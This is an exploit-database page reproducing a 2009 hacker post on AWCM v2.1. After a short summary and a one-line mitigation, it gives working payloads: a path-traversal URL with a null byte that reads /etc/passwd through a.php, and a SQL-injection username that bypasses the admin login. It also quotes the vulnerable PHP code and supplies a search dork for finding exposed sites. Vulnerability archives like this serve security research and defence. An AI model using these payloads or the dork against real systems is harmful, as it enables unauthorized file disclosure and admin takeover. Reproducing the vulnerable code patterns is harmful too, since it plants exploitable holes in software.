header-logo
Suggest Exploit
vendor:
AWCM
by:
SwEET-DeViL
7,5
CVSS
HIGH
Local File Disclosure and Authentication Bypass
20
CWE
Product Name: AWCM
Affected Version From: v2.1
Affected Version To: v2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:awcm:awcm:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2009

AWCM v2.1 (LFI/Auth Bypass) Vulnerabilities

AWCM v2.1 is vulnerable to Local File Disclosure and Authentication Bypass. The Local File Disclosure vulnerability exists due to insufficient sanitization of user-supplied input in the 'a' parameter of the 'a.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow an attacker to read arbitrary files from the server. The Authentication Bypass vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' and 'password' parameters of the 'login.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow an attacker to bypass authentication and gain access to the application.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

---------------------------------AWCM v2.1 (LFI/Auth Bypass) Vulnerabilities---------------------------------------
                       #                                                                            
   #    ####     #    ###      ##   ###  ####  ####  ###   #####   ####  ####   ###     #    ### ####  ######
   ##    #  #    ##    # #    # #  #  #   # #   #  #  #    #  #   #    #  # #  #  #     ##    #   # # #  #  #
   # #   #  #    # #   # #    # #  #      #     #  #   #   #  #  #        #    #        # #   #   #      #   
  #  #   ###    #  #   ###   #  #   ##    ###   ###    #  #   #  #        ###   ##      #  #  #   ###    #   
  ####   #  #   ####   #  # ######    #   #     #  #    # #   #  #        #       #     #   # #   #      #   
 #   #   #   # #   #   #  #     # #   #   #     #   #   ##    #   #    #  #   #   #     #    ##   #      #   
##    #####   ##    ######     ### ###   ####  ###   #   #   ###   ####  ####  ###   # ###    #  ####   ###  


#----------------------------------------------------------------------------------------------------------------
Script : AWCM
version : v2.1
Language:PHP
Demo : http://awcm.sourceforge.net/
Download : http://awcm.sourceforge.net/ar/down_pro.php?id=30
Dork: intext:Powered by AWCM v2.1
Found by :SwEET-DeViL

need magic_quotes_gpc = Off

#----------------------------------------------------------------------------------------------------------------
::: Local File Disclosure Vulnerability :::
)=> a.php
.................................................................................................................
if (isset($_GET['a'])) {
    $a = $_GET['a'];  <======================================:{
    if (file_exists("addons/$a/index.php")) {
        include ("addons/$a/index.php");
    }
.................................................................................................................
#Exploit:

http://www.site.com/a.php?a=../../../../../../../../etc/passwd%00

##############################################################################
::: Auth Bypass SQL Injection  Vulnerability :::

)=> login.php  AND  control/login.php

.................................................................................................................
if(isset($_GET['do'])) {
$user = $_POST['username'];  <======================================:{
$pass = md5($_POST['password']);

$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
.................................................................................................................
#Exploit:

put as username : 'or 1=1/*

##############################################################################

www.arab4services.net
/---------------------------------------------------\
|+------------------------------------------------+ |
||          SwEET-DeViL & viP HaCkEr              | |
||            gamr-14(at)hotmail.com              | |
|+------------------------------------------------+ |
\---------------------------------------------------/

# milw0rm.com [2009-07-23]

Navigation

Suggest Exploit

Services By CQR